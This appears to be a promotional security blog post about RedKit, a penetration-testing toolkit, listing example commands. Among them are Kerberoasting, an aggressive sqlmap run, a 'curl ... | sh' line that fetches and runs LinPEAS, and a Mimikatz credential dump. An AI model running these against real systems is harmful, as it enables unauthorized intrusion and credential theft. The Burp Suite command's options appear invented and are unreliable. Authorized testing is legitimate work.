Listen to this Post
Introduction
RedKit is a modular offensive security toolkit designed to streamline penetration testing workflows by providing pre-defined commands for enumeration, exploitation, privilege escalation, and post-exploitation. Developed by Shay Giladi, this tool aims to eliminate the hassle of memorizing complex command flags, allowing security professionals to focus on execution and results.
Learning Objectives
- Understand the core functionalities of RedKit for offensive security.
- Learn key commands for Active Directory, web app testing, and privilege escalation.
- Discover how RedKit can optimize penetration testing efficiency.
1. Enumeration with RedKit
Command:
nmap -sV -sC -p- <target_IP> -oN scan_results.txt
What It Does:
This Nmap command performs a comprehensive scan of all ports (-p-), detects service versions (-sV), and runs default scripts (-sC), saving results to a file (-oN).
How to Use in RedKit:
RedKit can auto-fill target IPs and output formats, reducing manual input errors.
2. Active Directory Exploitation
Command (Impacket’s GetUserSPNs):
GetUserSPNs.py -request -dc-ip <DC_IP> DOMAIN/user:password
What It Does:
This Kerberos attack retrieves Service Principal Names (SPNs) and requests TGS tickets for cracking.
RedKit Integration:
RedKit categorizes AD exploitation commands, allowing quick access to common attacks like Kerberoasting.
3. Web App Testing (SQL Injection)
Command (SQLmap):
sqlmap -u "http://target.com/page?id=1" --risk=3 --level=5 --batch
What It Does:
Automates SQL injection detection and exploitation with risk/level customization.
RedKit Advantage:
Pre-configured risk levels reduce the need for manual tuning.
4. Privilege Escalation (Linux)
Command (LinPEAS):
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
What It Does:
LinPEAS automates Linux privilege escalation checks.
RedKit Workflow:
RedKit can fetch and execute LinPEAS with a single click.
5. Post-Exploitation (Mimikatz)
Command:
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
What It Does:
Extracts plaintext credentials from memory in Windows environments.
RedKit Feature:
Pre-loaded Mimikatz commands simplify post-exploitation.
6. Cloud Hardening (AWS CLI)
Command:
aws iam get-account-authorization-details --query 'UserDetailList[].UserName'
What It Does:
Lists all IAM users in an AWS account for permission auditing.
RedKit’s Role:
RedKit can store and recall cloud security commands for rapid assessments.
7. API Security Testing
Command (Burp Suite CLI):
java -jar burpsuite.jar --project-file=api_scan.burp --api-scan-target=http://api.target.com
What It Does:
Automates API security scans using Burp Suite.
RedKit Efficiency:
RedKit can integrate with Burp for one-click API testing.
What Undercode Say
- Key Takeaway 1: RedKit significantly reduces pentesting overhead by centralizing offensive commands.
- Key Takeaway 2: Its modular design allows future expansion into cloud, AI-driven attacks, and automation.
Analysis:
RedKit bridges the gap between manual testing and full automation, making it ideal for red teams and bug bounty hunters. As offensive security evolves, tools like RedKit will become essential for rapid, repeatable testing.
Prediction
With AI integration, RedKit could evolve into an intelligent assistant that suggests attack vectors based on target reconnaissance, further revolutionizing penetration testing. Expect wider adoption as the tool matures.
🔗 Get RedKit Here: https://lnkd.in/d8gnGKnF
IT/Security Reporter URL:
Reported By: Shay Giladi – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
